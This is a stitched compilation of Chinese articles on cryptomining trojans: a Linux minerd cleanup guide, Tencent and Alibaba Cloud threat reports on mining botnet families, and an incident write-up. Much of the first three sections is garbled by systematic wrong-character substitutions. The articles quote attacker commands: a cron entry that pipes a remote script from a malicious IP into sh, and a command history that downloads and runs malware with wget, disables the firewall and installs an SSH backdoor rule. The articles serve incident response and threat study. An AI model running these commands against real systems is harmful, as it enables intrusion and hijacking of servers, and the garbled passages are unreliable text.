木马

前言在日常应用Linux零碎服务器时，如果系统安全保护方面做的不够标准和谨严，很容易导致主机被黑客植入歹意木马病毒被当做肉鸡。当前就是一次肉鸡木马病毒的排查过程，有助于运维服务器时遇到此状况时进行针对性的排查和修复。 【问题景象】Linux主机CPU跑满，或者应用服务器越来越慢，以及收到报警信息提醒服务器有对外歹意扫描。  【问题起因】这种情况在呈现时通过top命令能够看到有一个minerd过程占用CPU较高。 经定位，该过程是一个挖矿程序，通过上述截图能够看到过程对应的PID为1170，依据过程ID查问一下产生过程的程序门路执行ll /proc/$PID/exe,其中$PID为查问到的过程ID 异样程序在/opt目录下此程序个别是由打算工作产生的，Linux零碎中默认创立了打算工作后会在/var/spool/cron目录下创立对应用户的打算工作脚本，执行ls /var/spool/cron 查问一下零碎中是否有异样的打算工作脚本程序。 能够看到，在此目录下有1个root的打算工作脚本和一个异样的目录crontabs（默认状况下不会有此目录，用户创立打算工作也不会产生此目录）查看脚本内容，有一个每隔10分钟便会通过curl下载执行的脚本程序（crontabs目录下为同样内容的打算工作）手动将脚本内容下载到本地，脚本内容如下：剖析此脚本，次要进行了如下批改：1、创立了上述查看到的两个打算工作脚本2、创立了密钥认证文件，导入到了/root/.ssh目录下（以后脚本的密钥文件名是KHK75NEOiq，此名称可能会有所变动，要依据具体情况进行核实）3、批改ssh配置文件容许了root近程登录，容许了密钥认证，批改默认的密钥认证文件名4、重启了sshd服务使配置失效5、创立了假装程序ntp，并运行了ntp程序6、查问零碎中是否有失常运行的打算工作，杀死正在运行的打算工作过程。 【解决办法】依据以上剖析，提供以下解决办法：1、删除打算工作脚本中异样配置项，如果以后零碎之前并未配置过打算工作，能够间接执行rm -rf /var/spool/cron/* 状况打算脚本目录即可。2、删除黑客创立的密钥认证文件，如果以后零碎之前并未配置过密钥认证，能够间接执行rm -rf /root/.ssh/* 清空认证寄存目录即可。如果有配置过密钥认证，须要删除指定的黑客创立的认证文件即可，以后脚本的密钥文件名是KHK75NEOiq，此名称可能会有所变动，要依据具体情况进行核实。3、修复ssh配置项，依据集体需要进行批改，个别默认脚本中进行批改的PermitRootLogin、RSAAuthentication、PubkeyAuthentication为开启状态，须要批改的是密钥认证文件名，倡议批改成默认值AuthorizedKeysFile     .ssh/authorized_keys即可。批改实现后重启sshd服务，使配置失效即可。4、删除黑客创立的假装程序ntp 执行ls /etc/init.d/能够看到零碎中是由对应的假装程序的通过chkconfig --list  ntp 能够看到此程序默认设置的是开机主动启动。如果此程序不进行革除，即便删除了minerd程序并且杀死了对应的过程，过一会零碎还会从新创立minerd程序，并产生新的过程查问一下以后零碎中是否有ntp过程，能够看到ntp过程是通过/usr/sbin/ntp程序产生，因而须要把对应的执行程序也进行删除。总结一下删除假装程序的操作步骤kill -9 $PID 杀死查问到的ntp过程rm -rf /etc/init.d/ntprm -rf /usr/sbin/ntp （此门路要依据具体的查问数据确定，理论状况可能会有所变动） 5、依据之前的查问minerd程序所在门路为/opt，在执行的脚本中同时也在/opt目录下创立了一个KHK75NEOiq33的程序文件，因而要删除这两个文件，执行rm -rf KHK75NEOiq33 minerd 即可。6、应用kill命令杀死minerd过程通过ps命令查问一下minerd对应的过程详细情况。kill -9 $PID 杀死对应的过程ID备注：依据ps查问结果显示minerd有向域名xmr.crypto-pool.fr进行数据通信，通过ping测试域名解析核实此域名对应的IP地址，而后在ip.taobao.com进行查问显示IP为法国的IP，而后通过iftop -i eth1 -PB命令对流量进行了监控，的确存在向法国的IP发送数据的状况，为了防止再次被入侵，能够通过iptables屏蔽对应的异样IP（具体的IP和域名要依据理论查问的状况而定，可能会有所不同）。 以上修复实现后能够期待一会再次进行一下察看，看看是否还会在/opt目录下创立新的minerd程序，以及是否还有新的minerd过程产生。  最初，倡议平时加强服务器的平安保护，优化代码，以防止因程序破绽等导致服务器被入侵。

提到挖矿木马时，一部分人一脸困惑：“挖矿不必挖机？木马怎么挖？”。诚实说，遇到这种，小编也无言以对。 另有人晓得挖矿木马是什么，但他很不屑：“不就是零碎卡一点慢一点么，啥毁坏都没有，用不着少见多怪吧。”小编说，“这位童鞋，你大错特错了，警惕性已低于及格线，得连忙回炉修炼一下。” 挖矿木马不是所谓“良性”病毒，除了影响零碎运行速度，让资源占用率飙升，挖矿木马还会广泛留置后门，中了挖矿木马，企业机密信息就奄奄一息了。明天这篇文章让大家具体理解下挖矿木马并不简略。 比特币、山寨币与挖矿木马 比特币是以区块链技术为根底的虚构加密货币，比特币具备匿名性和难以追踪的特点，通过十余年的倒退，已成为网络黑产最爱应用的交易媒介。大多数勒索病毒在加密受害者数据后，会勒索代价昂扬的比特币。比特币在2021年曾达到1枚6.4万美元的天价，比特币的取得须要高性能计算机（又称矿机，个别配置顶级CPU和GPU）按特定算法计算，计算的过程被形象的称为“挖矿”。 矿机价格昂贵，为生产比特币，有人不惜重金购买大量矿机组成网络集群挖矿。挖矿又十分耗电，因而矿场往往会寻找偏僻地区的小水电、小火电而建，因为电费便宜，甚至有经营矿场的人偷电挖矿。当数字加密币市值暴涨时，挖矿业务会水涨船高，高端CPU、GPU、高端显卡、大容量硬盘被炒上天价还卖断货。目前，我国政府发表要实现碳达峰碳中和的指标，重大耗能的虚构加密币相干生产、交易被认定为非法，我国境内所有（以生产加密货币）矿场必须敞开。 因挖矿须要大量财力投入，从一开始，就有人想到利用木马管制别人的计算机组建僵尸网络集群挖矿的方法，这就是所谓“挖矿木马”。因比特币的取得（挖矿）难度越来越大，诞生了模拟比特币的其余山寨加密币，比方门罗币、莱特币、还有马斯克超喜爱的狗狗币等等。其中挖矿木马最爱门罗币（XMR），自诞生以来，门罗币市值一直回升，目前已超过10亿美元。 被重大低估的挖矿木马危害 新基建推动企业全面数字化，越来越多的政企机构将业务上云，公共服务、生产生存各方面效率由此疾速进步，人人成为数字化的受益者。与此同时，数字化转型过程中呈现新的平安危险，比方信息泄露简直影响每一个人。人们对数字化零碎的依赖，对系统稳固运行有极高的要求。如果业务服务因故中断，会给社会性能失常运行带来很多麻烦。 挖矿木马攻打，就是发生率较高，极可能造成业务零碎中断的一类威逼，是最常见的网络攻击。依据腾讯平安团队最新检测后果，在私有云的攻打事件当中，以挖矿为目标的入侵占比54.9%，已超过一半，腾讯云在过来30天累计检测到挖矿木马攻打事件超过6000起。有境外科技媒体报道，挖矿木马攻打在所有安全事件中超过25%。 黑客通过各种技术手段流传扩散挖矿木马，木马管制的计算机越多，木马生存工夫越长，取得的挖矿收益也就越多。挖矿木马最显著的影响是大量耗费系统资源，使零碎其他软件或服务运行迟缓，性能变差。云主机被挖矿木马入侵，失常服务可能因性能变差而速度变慢，甚至服务解体中断，管理员通过top -c命令查看零碎过程，会发现CPU占用超高。 挖矿木马为实现长期驻留荫蔽挖矿的指标，会采纳很多技巧。腾讯平安专家剖析发现，有挖矿木马会设置一个占用系统资源的下限，比方不超过80%。局部挖矿木马设计了检测零碎工具运行的能力，当检测到过程管理器启动时，挖矿过程马上进行。或只在电脑黑屏时挖矿，有人操作电脑时退出等等。还有其余简单的技巧，包含暗藏过程，或替换、假装零碎过程，坑骗管理员排查等。 很多人认为挖矿木马只不过让零碎变慢，耗费系统资源，不会有破坏性结果。这种认识重大低估了挖矿木马的危害，挖矿木马的影响远不止这些。 腾讯平安团队日常经营中剖析了大量挖矿木马家族，除了大量耗费受害者主机计算机资源，烦扰失常业务运行。挖矿木马广泛具备以下行为： 增加SSH免密登录后门增加具备管理员权限的帐户装置IRC后门，承受近程IRC服务器的指令反对替换多个零碎工具：ps、top、pstree等装置Rootkit后门敞开Linux/Windows防火墙敞开Windows Defender卸载云主机平安防护软件增加定时工作、增加启动项革除系统日志以上行为会严重威胁服务器平安，挖矿木马控制者随时可能窃取服务器机密信息，管制服务器进行DDoS攻打，以此服务器为跳板攻打其余计算机，甚至能够在任何时候开释勒索病毒彻底瘫痪服务器。敞开、卸载防火墙和主机安全软件的行为，会让受益主机平安防护能力隐没，导致服务器被其余黑产团伙入侵管制的可能性倍增。 挖矿木马的指标除了云主机，还有一类数量散布极广的设施：IoT智能设施，包含智能路由器、网络摄像头等等。因为不少这类设施的制造商应用开源零碎，本身平安能力绝对有余，所用组件的高危破绽修复艰难，同时，应用这类设施用户也往往对平安危险思考不多，积极主动修复破绽的较少。导致大量IoT设施因破绽被入侵继续管制，直至用户淘汰旧设施更换新设施。被管制的IoT设施，除了用于挖矿，也被用来收集隐衷信息、通过DDoS攻打来非法获利。 挖矿木马的入侵通道 利用破绽武器和弱明码爆破攻打，是挖矿木马攻打流传最罕用的两类办法。供应链攻打的案例也时有发生，虽说案例较少，但具备影响面大的特点。 腾讯平安团队日常剖析大量挖矿木马家族，不少挖矿木马非常怠惰，特地善于利用风行破绽攻打武器入侵。当一个利用难度较低实用面广的高危破绽呈现时，会发现一群挖矿木马团伙如发现金矿个别蜂涌而至。 往年8月25日，Atlassian官网披露Atlassian Confluence 近程代码执行破绽（CVE-2021-26084)，攻击者利用破绽能够齐全管制服务器实现任何可能的工作。9月1日，破绽poc（概念验证代码）被公开在Github。当晚，腾讯平安团队检测到多个不同挖矿木马团伙、僵尸网络团伙利用该破绽攻打云主机。第2天，发现利用该破绽攻打的黑产团伙减少到7个，其中5个为挖矿木马家族：kwroksminer，iduckminer，h2miner，8220Miner，z0miner。 同样，一个挖矿木马团伙也可能利用多个不同的破绽攻打武器组合。腾讯平安曾截获跨平台蠕虫HolesWarm，该蠕虫利用20余种破绽武器攻打Windows、Linux主机挖矿。 网络服务的弱口令配置也是挖矿木马入侵的重要通道，不少挖矿木马会携带或下载弱明码字典进行爆破攻打。 挖矿木马常见的攻击方式及攻打结果能够参考下图： 咱们将常见挖矿木马攻打事件对应到ATT&CK映射图谱，以形容此类威逼的技术特点： 本期内容，咱们探讨了挖矿木马的惯用手法和危害，之后会通过多个章节来介绍如何采取措施高效检测和革除挖矿木马。

近期，加密货币市场堪称热度十足。数字资产交易网站Crypto.com的一项考察显示，截至2021年1月，寰球已有1.06亿加密货币用户。各类数字加密货币价格暴涨是推动用户数增长的次要驱动力。然而，用户数减少的同时，数字货币也引来了黑产的垂涎，过来一年挖矿木马回升趋势显著。 在此背景下，腾讯平安近日公布《2020挖矿木马年度报告》（以下简称《报告》），以腾讯平安产品获取的安全事件告警工单数据为根底，从攻打起源、入侵特点、破绽利用偏好、长久化运行伎俩等维度，分析过来一年挖矿木马的攻打局势，并对其演变趋势作了预判。《报告》指出，利益驱使下，挖矿团伙对新破绽武器的采纳速度正在放慢，挖矿团伙跟僵尸网络互相团结的状况也日趋多见。 新沉闷挖矿木马家族偏好攻打Linux服务器 依据《报告》，DTLMiner、H2Miner和GuardMiner是2020年度排名前三的挖矿木马家族，此外z0Miner、SystemdMiner、WachtdogMiner、8220Miner等家族也名落孙山。 入侵形式包含利用破绽攻打、爆破攻打、僵尸网络渠道攻打等。攻击者通过近程代码执行破绽（RCE）能够间接向后盾服务器近程注入操作系统命令或恶意代码，从而管制后盾零碎。WebLogic CVE-2019-2725是2020年挖矿木马最常利用的RCE破绽。此外，利用各种未受权拜访破绽，也是挖矿木马的次要攻打门路之一。 《报告》显示，许多挖矿木马在流传时会针对零碎的弱明码进行爆破攻打。依据腾讯平安2020年云上平安报告提供的数据，默认用户名、端口名被爆破攻打的次数多达数十亿次。常被挖矿木马爆破攻打的服务类型包含SSH、Mssql、Redis等。 利用僵尸网络渠道散发也成为挖矿木马越来越偏好的流传伎俩之一，甚至挖矿木马本身也在组建僵尸网络。具备僵尸网络特色的挖矿木马TOP3仍是DTLMiner、H2Miner、GuardMiner这些老牌僵尸网络，而2020年新沉闷的挖矿木马家族以攻打Linux服务器居多。 针对云上的攻打增长较快，挖矿团伙和僵尸网络互相团结 《报告》显示，挖矿木马针对云上的攻打增长较快。将来，泛滥网络组件的安全漏洞仍会源源不断涌现，而在利益的驱使下，挖矿团伙对新破绽武器的采纳速度也会越来越快。以后，旧的挖矿僵尸网络仍然沉闷，新的僵尸网络一直呈现，挖矿团伙跟僵尸网络互相团结的状况日趋多见。简单的平安态势对政企机构提出了微小挑战。 挖矿木马不仅会导致服务器性能重大降落，影响服务器业务零碎的失常运行，还有可能让服务器沦为黑客管制的肉鸡电脑，对其余指标发动攻打。攻击者入侵胜利，很多状况下已取得服务器的齐全权限，只有攻击者违心，就可能盗取服务器数据，使受益企业面临信息泄露危险。更重大的是，攻击者还有可能在服务器装置后门、服务和打算工作，实现对失陷主机的巩固长期管制。 增强明码、受权验证、更新组件，三大措施抵挡挖矿木马 针对日益猖狂的挖矿木马攻打，《报告》倡议政企机构从多方面采取措施，保障服务器平安。首先，对Linux服务器的SSH服务、Windows SQL Server等罕用主机拜访入口设置高强度的登录明码，以反抗弱口令爆破攻打。其次，对于Redis、Hadoop Yarn、Docker、XXL-JOB、Postgres等利用减少受权验证，对拜访对象进行管制。如果服务器部署了Weblogic、Apache Struts、Apache Flink、ThinkPHP等常常曝出高危破绽的服务器组件，应及时将其更新到最新版本，并实时关注组件官方网站和各大平安厂商收回的平安布告，依据提醒修复相干破绽。 同时，腾讯平安还针对以后安全形势打造了全面残缺的解决方案，可帮忙政企机构构建多层次的纵深进攻体系，全面阻断挖矿木马的攻打威逼。腾讯主机平安零碎和云防火墙(CFW)反对查杀绝大多数挖矿木马程序及其利用的RCE破绽、未受权拜访破绽，同时还反对弱口令爆破攻打检测，可能提供云上终端的防毒杀毒、防入侵、破绽治理、基线治理等服务。腾讯云平安经营核心可能为客户提供破绽情报、威逼发现、事件处理、基线合规，及泄露监测、危险可视等能力。政企机构能够通过部署相应平安产品阻断挖矿木马攻打，筑牢平安底座。

前言比特币等虚拟货币在2019年迎来了久违的大幅上涨，从最低3000美元上涨至7月份的14000美元，涨幅达300%，巨大的金钱诱惑使得更多的黑产团伙加入了恶意挖矿的行列。阿里云安全团队通过对云上僵尸网络家族的监控，发现恶意挖矿已成为黑产团伙主要的牟利方式。2019年共监控到58个成规模的挖矿木马团伙(数据截止到8月底)，以累积感染量定义木马活跃度，下图/表是活跃TOP10的木马家族及简介。本文尝试从宏观角度分析、总结挖矿木马常用技术及发展趋势，以期能够给企业安全防护带来启示。 家族名 简介 平台 攻击方式ddgs一个Go语言实现的挖矿僵尸网络，最早曝光于2017年10月。LinuxSSH、Redis爆破MinerGuard一个Go语言实现的挖矿僵尸网络，2019年4月开始爆发Windows、Linux双平台SSH、Redis、Sqlserver爆破、多种web服务漏洞(ElasticSearch、Weblogic、Spring、ThinkPHP等)kerberods2019年4月开始爆发的挖矿僵尸网络LinuxSSH爆破、Redis爆破、Confluence RCE等Web服务漏洞kworkerdsrootkit挖矿蠕虫，最早曝光于2018年9月Linux、Windows双平台ssh、redis爆破、WebLogic远程代码执行漏洞等buleheroWindows下的挖矿蠕虫病毒，最早曝光于2018年8月Windows永恒之蓝漏洞、ipc$爆破以及Struts2RCE、ThinkPHP RCE等多个Web服务漏洞CryptoSink2019年3月开始爆发，会将其他矿池地址解析为127.0.0.1Linux、Windows双平台ElasticSearch未授权访问漏洞、Redis爆破systemdMiner2019年4月爆发，借助入侵ddgs的c&c服务器快速扩张LinuxHadoop Yarn未授权访问漏洞、SSH密钥watchdogs2019年2月爆发，Linux下的挖矿蠕虫LinuxSSH爆破、Redis爆破8220Miner8220挖矿团伙是一个长期活跃的利用多个漏洞进行攻击和部署挖矿程序的国内团伙，最早曝光于2018年8月Linux、Windows双平台Hadoop Yarn未授权访问漏洞、docker未授权访问漏洞等多个web服务漏洞ibusPerl脚本实现的挖矿蠕虫，2019年1月开始爆发LinuxThinkPHP5 RCE、java反序列化漏洞、Weblogic WLS组件RCE漏洞、WebLogic 任意文件上传漏洞、redis 未授权访问漏洞等核心观点木马投放方式全面蠕虫化，多种漏洞组合攻击成为趋势，N-day漏洞利用速度在加快 这种趋势无疑令人异常担忧，意味着挖矿木马的传播能力在大幅增强，变得无孔不入。一旦企业的信息系统存在任意可被利用的漏洞，那么企业内网将会快速沦陷，挖矿行为会抢占CPU资源，严重影响企业信息系统运行。这对企业的漏洞管理和安全防御能力有了更高、更快的要求。 木马持久化技术被成熟利用，rootkit、无文件技术成为趋势 挖矿木马入侵成功后必定希望能够长久稳定的挖掘出虚拟货币，其技术上使用rootkit、无文件等技术实现长期、隐蔽运行。对于一般的运维人员，系统一旦中招后，顽固木马是难以清除的，这需要企业具备更专业的安全应急响应能力。 木马开始出现跨平台趋势 Golang语言天生具备跨平台编译能力，这个特点方便黑产团伙在多平台间移植，新出现的恶意软件使用GO也成为了一种趋势。TOP10中有6个是2019年爆发的挖矿木马，其中有5个是GO语言实现的，MinerGuard和kworkerds已具备了Linux/Windows双平台传播的能力。 工欲善，利其器-攻击之术全网漏洞扫描/投放->蠕虫化投放1、利用单一或多个IP攻击全网漏洞进行投放 这种投放方式较为原始，无横向传播能力，效率比较低下，且容易被防御拦截。在我们的监控中，使用这种方式的木马规模普遍较小。例如：8220Miner固定使用多个国外IP进行持续攻击，会定期更换IP，但更换频率较低。而ddsMiner通过sqlserver入侵，攻击载荷会下载名为dds.exe的PE文件(如:[http://113[.]69[.]206[.]219:4523/dds.exe)](https://yq.aliyun.com/go/arti...，该团伙每天至少使用1个新的IP进行全网攻击，攻击时间持续数小时，该IP也是当天的恶意文件托管站。 2、蠕虫化投放 蠕虫化的挖矿botnet具备攻击模块，扫描并感染网络上的其他服务器，使用这种方式进行传播会按照指数增长的速度扩张，且这种方式会使得溯源和防御变得更加困难。TOP10中2019年爆发的几个挖矿botnet全部使用蠕虫化投放方式，他们都是在短时间内(几天时间)得到快速扩张跻身TOP10。 单一漏洞利用->组合漏洞横向传播早期的挖矿木马使用固定漏洞在公网传播，传播速度和规模受限。而使用多种漏洞组合攻击的方式使得挖矿木马具备了内网横向传播的能力，攻击模块会集成通用的WEB服务漏洞、爆破、数据库漏洞等攻击方式。‘聪明’的挖矿木马作者更是使用不同的内外网攻击策略，进行更高效的传播。例如：Windows平台下的Bulehero挖矿木马，在内网优先使用永恒之蓝漏洞、ipc$爆破、RDP爆破进行传播，在公网则优先使用Web服务漏洞进行传播。Linux平台下的kerberods挖矿木马，在内网优先使用本地ssh key、ssh爆破进行传播。在这种高效策略下，企业内网通常在几分钟内被全部入侵。 N-day漏洞快速利用互联网大规模存在且未被修复的通用漏洞往往成为挖矿僵尸网络争夺的'肥肉'，N-day漏洞爆发后难以在短时间内得到有效修复，'嗅觉'灵敏的黑产团伙会很快纳入挖矿木马的武器库。据我们观察，N-day漏洞留给运维人员进行修复的空窗期越来越短，如Jboss反序列化漏洞于2017年5月被发现，年底JbossMiner开始对其大规模利用。2018年12月ThinkPhp远程代码执行漏洞爆发，十几天后被BuleHero团伙利用进行。2019年4月8日Confluence RCE 漏洞利用POC发布，4月10日就kererods蠕虫就开始利用该漏洞大肆传播，中间只隔了短短两天。再次对云平台及用户的快速响应能力构成严峻考验。 通往财富之路-牟利之术矿池配置方式：挖矿木马植入开源挖矿程序进行挖矿，矿机程序启动时通过命令行传入挖矿参数，但是这种方式较为原始，释放出的木马无法修改配置参数。第二种方式使用配置文件下发，结合定时任务实现对挖矿参数的控制，这种使用方式较为常见。以上两种方式都存在易被检测的特点，有些黑产团伙会对开源挖矿程序进行二次开发，将矿机配置参数硬编码在恶意程序中，并进行加壳对抗检测，以达到隐蔽挖矿的目的。 挖矿程序命令行配置  通过配置文件：MinerGuard矿机配置文件截图 挖矿软件硬编码配置 ddgs硬编码的矿池及钱包地址 挖矿方式：公共矿池->矿池代理1、公共矿池方式 使用匿名的公共矿池是恶意挖矿最常见的方式，使用方法简单，但是由于需要配置独立的钱包地址，因此易被跟踪溯源，而且对bot挖矿无管理能力。 如下图是在公共矿池上查询8220Miner的钱包地址及算力，目前该地址挖掘到15.5个门罗币，可借此估算出该挖矿僵尸网络的规模。 2、矿池代理 有些挖矿僵尸网络会自己搭建矿池代理，通过代理可降低挖矿难度，也可根据收益随时切换高收益矿池、高收益矿币种，这种方式无法通过钱包地址进行跟踪。 下图是监控到masscanMiner使用了矿池代理进行挖矿，通过进程cmdline可知矿池开放在121.42.151.137的28850端口，这并非一公共矿池常用的端口，登陆账号也为默认账号。 其他变现方式：附带DDos、Socks代理除了挖矿这种本职工作，有些黑产团伙会顺带通过其他方式进行变现，比如DDos、代理等。如下图是sicMiner恶意样本会运行一个python脚本，该脚本是github上开源的socks5代理，代理运行在7081端口，该团伙可能是通过出售代理进行变现。 生存还是毁灭-持久化之术挖矿木马入侵成功后需要长期驻留于目标操作系统，以达到长期稳定地产出虚拟货币，通常会使用各种技术对抗安全检测和运维人员的清除。 清除/卸载安全软件卸载宿主机的安全防护软件是常规操作，由于挖矿的攻击行为多针对服务器，黑产团伙也特别针对云环境的安全软件精准对抗。如下是kworderds蠕虫在windows、Linux下卸载不同安全软件的行为。 kworkerds关闭杀毒软件 kworkerds挖矿蠕虫卸载安骑士等安全工具 rootkit技术1、通过定时任务/计划任务实现常驻 Linux下的crontab定时任务是很多恶意软件常见的驻留方式，他们并不仅仅会把自己写入用户的crontab，还会写入软件包的crontab,如/etc/cron.d，这样使得自己更不容易被发现。而Windows下则通过计划任务、修改注册表实现类似的驻留方式。如下是ddgs蠕虫恶意进程行为通过crondtab启动。 ddgs通过CROND定时任务启动恶意shell:/bin/sh -c curl -fsSL [http://218[.]248[.]40[.]228:9999/i.sh?6](https://yq.aliyun.com/go/arti... | sh 2、动态链接库预加载型rootkit Linux下的动态链接库预加载机制在加载其他常规系统库之前就会预先加载用户定义的动态链接库，如果自定义库的函数与系统库中找到的函数具有相同的名称，自定义动态链接库就会覆盖系统库中的函数。攻击者通过动态连接库预加载，实现对libc中诸如readdir等常用函数的hook，当ps、top等shell指令尝试读取/proc/目录获取进程信息时对恶意进行隐藏。 如下图是8220miner使用该技术劫持linux动态链接库配置文件/etc/ld.so.preload。 无文件攻击技术无文件攻击不需要将恶意软件落地到磁盘，因此难以被杀软查杀，具备更好的隐蔽性。在挖矿僵尸网络中通常使用各种工具(比如Windows的WMI命令行工具wmic.exe)或者脚本编程语言(如PowerShell)提供的API接口访问WMI，来实现无文件攻击。如下是TheHidden使用wmic、WannaMine使用powershell进行无文件攻击。 TheHidden使用wmic无文件攻击的代码片段 WannaMine的恶意进程使用powershell隐藏、编码功能进行无文件攻击 文件名/路径混淆除了对抗各种安全工具，还要对抗运维人员的手动排查，将文件名和路径进行混淆也是常用的手段。比如ibus会将恶意文件写入多个系统目录下，并且通过随机变更大小写等方式生成和隐藏目录下文件名类似的混淆文件名。 ibus生成在系统目录下的混淆目录 ibus生成混淆文件名 c&c通信由于恶意挖矿行为不需要对bot进行强控制，大部分的挖矿木马都不具备完备的c&c控制模块，他们通常使用配置文件结合定时任务，实现对bot的配置变更和版本更新。在TOP10中只有ddgs和ibus有完备的c&c控制功能。如ddgs，它的c&c通信使用uMsg序列化，能够实现攻击指令下发、版本配置更新等功能，在今年1月份的更新中甚至开始使用P2P进行c&c控制IP的下发。 ddgs反序列化后的c&c控制指令 ibus的c&c控制模块的恶意代码 ...

事件背景回想起来应该算是去年的事情了, 时值 2019 年 1 月 24 日早上, 当时我正忙碌于开发手头的一个珠宝分销系统项目, 由于已经进行了多日封闭式开发, 项目初见效果, 准备放到内网服务器 A 上跑跑看. 项目的一些功能需要通过公网才能访问, 于是便打算通过一台之前就架设在公网的服务器 B上做 SSH 端口转发, 将服务器 A 指定端口映射到服务器 B 上. 多次尝试服务器账号密码进行 SSH 连接, 发现居然一直无法连上, 怕是被其它同事改了密码, 但是询问下发现其它人也无法连上.初步分析首先, 不可能是服务器物理机宕机, 因为服务器 B 根本不是一台真正的物理机, 而只是用 Vmware 开出来的一台虚拟机, 由于配置了外网地址的虚拟网卡, 所以可以通过外网访问. 这里说一下, 公司的网络平时都是跑在内网的, 有前辈写好的(也有可能是买其他公司的)的网络管理服务端, 项目本身也只允许跑在内网服务器, 需要外网访问只好用穿透技术. Vmware 的稳定性还是很好的, 上面的其他服务器仍然坚挺. 好在 Vmware 拥有虚拟机的直接控制权限, 发现依然可以使用 root 用户登录服务器 B, 这说明服务器密码尚未修改, 只是 SSH 出于什么原因挂了, 导致无法通过远程 SSH 登录.直接在 Vmware 管理界面用 root 用户登录, 通过ps auxf命令发现 sshd 进程依然跑得好好的, 最近的 updatetime 是很久之前. 另外, 可以通过ping命令得到服务器的回应. 查看路由器的流量数据, 发现这台服务器居然在短短的 10 多天内有近 3TB 的上传流量. 而这台服务器作为跳板机根本没跑什么其它高流量的服务, 显然这台服务器是被攻击了.先使用netstat -anp命令查看 TCP 连接情况, 发现这台服务器已经和182.100.67.***, 和 23.234.14.两台意义不明的服务器建立了连接, 查看 whois 发现 182.100.67.是属于江西新余的IP, 而23.234.14.居然是美国洛杉矶的. 看来攻击者为了攻击花了不少心思, 寻思用匿名的跳板机来混淆视线. 介于此时已经无法使用 SSH 远程登录, 攻击者应该是针对 sshd 做了什么动作, 攻击者八成是已经拿到 Shell 了, 而且由于监测到异常流量, 攻击者应该是在这台服务器中跑了什么病毒进程, 无奈ps auxf 列出的进程较多, 很多还是系统进程, 一时不好判断哪个是病毒进程. 查看 user 发现除了 root 没有新的用户被新建, 就打算用history看看会不会记录攻击者的攻击痕迹, 结果是, 居然没有.发现攻击方式但是要注意到 linux 的history是会话隔离的, 同一个用户用不同的会话登录, 不同的会话有不同的命令历史, 只有在所有会话关闭之后才会将不同会话的历史合并, 比如:session A:$ echo session_a$ history 1 echo session_a2 history# 不关闭 session A, session B 无法拿到 session A 的历史session B:$ echo session_b1 echo session_b2 history# 关闭 session A 和 session B 之后 打开 session C:session c:$ history1 echo session_a2 history3 echo session_b4 history也就是说, 如果攻击者仍然与这台服务器保持着 SSH 连接, 是无法看到命令行历史的. 于是重启 sshd 进程强制中断连接. 再次连接, 这时发现了不得了的事情, 下面是攻击者的关键命令行历史(一些无用的命令删掉了):56 shutdown -h now57 netstat -anp|grep 44358 vi /etc/ssh/sshd_config 59 service sshd restart60 netstat -anp|grep 44361 kill 232264 ifconfig65 tcpdump -i ens160 port 443 -nn -s0 66 systemctl status firewalld 67 systemctl stop firewalld68 systemctl disable firewalld71 netstat -anp|grep ssh72 kill -9 239673 netstat -anp|grep ssh89 service sshd restart90 cd /usr/bin91 wget http://23.234.14.:12345/servicese92 chmod 777 servicese93 ./servicese96 ifconfig97 iptables -I INPUT -p tcp –dport 22 -j DROP98 iptables -I INPUT -s 182.100.67. -p tcp –dport 22 -j ACCEPT看这些命令, 操作很流畅.首先 vi /etc/ssh/sshd_config 修改 sshd 配置, 估计攻击者意图查看 sshd 的连接方式.然后查看运行在 443 端口的进程并杀死, 这很奇怪, 印像中这服务器当初并没有在 443 跑什么东西, 攻击者为了保证 443 没有连接还用tcp dump抓取网卡的 443 端口的包.之后攻击者关闭了防火墙firewalld.攻击者再次重启了 sshd.关键的地方, 攻击者开始注入病毒程序, 进入/usr/bin, 使用wget从http://23.234.14.:12345把病毒程序servicese下载, 更改权限为777使程序能够被执行, ./servicese运行病毒程序.可耻的地方, 攻击者之前关闭了firewalld防火墙, 这里居然使用iptables加入 IP 限制, 把所有连接到 22 端口的 TCP 连接都拒掉, 即: iptables -I INPUT -p tcp –dport 22 -j DROP, 这直接导致之前无法通过 ssh 远程连接上, 但是攻击者留了一个后门, 就是允许182.100.67.*这个 IP 通过 22 端口进行 ssh 连接, 也就是之前查到的江西新余的 IP.现在攻击者的攻击方式很明了, 看起来攻击者并没有想象中的高明, 也从进程中找到了servicese进程, 说实话, servicese这个程序名还是有点意思的, 因为和系统的守护进程service长得比较像, 导致无法一眼看出这个程序有什么不对劲. 后面用 nmap 对美国的 IP 和新余的 IP 进行端口扫描了一下, 发现新余机子是一台 windows2008, 确实应该是攻击者用来攻击并连接的服务器, 而美国的服务器只是一个 http 服务器, 提供病毒程序的下载源地址. 发现被攻击的时候, http://23.234.14.:12345依然可以访问, 可以直接从那里下载病毒程序, 不过现在是被攻击者主动关闭, 无法访问.那么攻击者是如何拿到服务器的权限呢? 说起来也有点丢人, 猜测应该是暴力破解了. 因为这台服务器平时只是作为跳板机, 所以连接密码是弱密码, 很容易通过彩虹表或者试错 猜出来. 这里告诫各位: 代码千万行, 安全第一条, 密码太弱鸡, 开发两行泪.分析病毒样本现在要确定病毒程序servicese到底对服务器做了什么. 使用tail命令查看servicese二进制文件的最后几行的内容, 发现了:gnu_cxx15__mt_alloc_baseIjE9constructEPjRKj_ZNSt13runtime_errorC1ERKSs_nl_load_locale_from_archivewctrans_ZTS8CSubTask_ZNKSt12_Vector_baseIP14CThreadHttpGetSaIS1_EE13get_allocatorgnu_cxx15,runtime_error,Vector_baseIP14CThread等词直接表明这是一个使用 CPP 编写的程序, 于是采用 C 语言强大的反编译神器 IDA 对源程序进行反编译, 看能不能找到什么线索. 这里注意, 当病毒程序被从服务器拷贝到本地 windows 的时候, 直接就被 windows defender 给清理掉了, 可见这应该是一个已经被记录在案的病毒程序.我并不打算详细说 IDA 的分析过程, 只是在审查病毒程序的函数时发现了名为MainBeikong的函数, 然后网上一搜, 就发现了 360 团队发出的这篇文章:某僵尸网络被控端恶意样本分析. 这篇文章描述的病毒样本和我手上的这个病毒程序有惊人的相似度:都是 1223123 字节, 但是 MD5 貌似不一样, 我这边的是cde16928b968cb087c961a258ba45442, 文章给出的是 EFF1CB4E98BCC8FBCBDCA671D4C4A050, 应该是有改动;使用readelf获得的源代码文件名完全一致;病毒的攻击目标相似: 网络中bot节点多是一些存在弱口令或软件漏洞的 linux 主机, 这台服务器属于弱口令目标.攻击后端症状相似, 病毒在获得服务器控制权后会执行对外 DDOS 攻击, 也就是说此时服务器称为了攻击者的肉鸡, 攻击者可以使用服务器的 CPU 资源和网路资源对其它服务器进行流量攻击, 其攻击力度可以参考 360 团队那篇文章描述的, 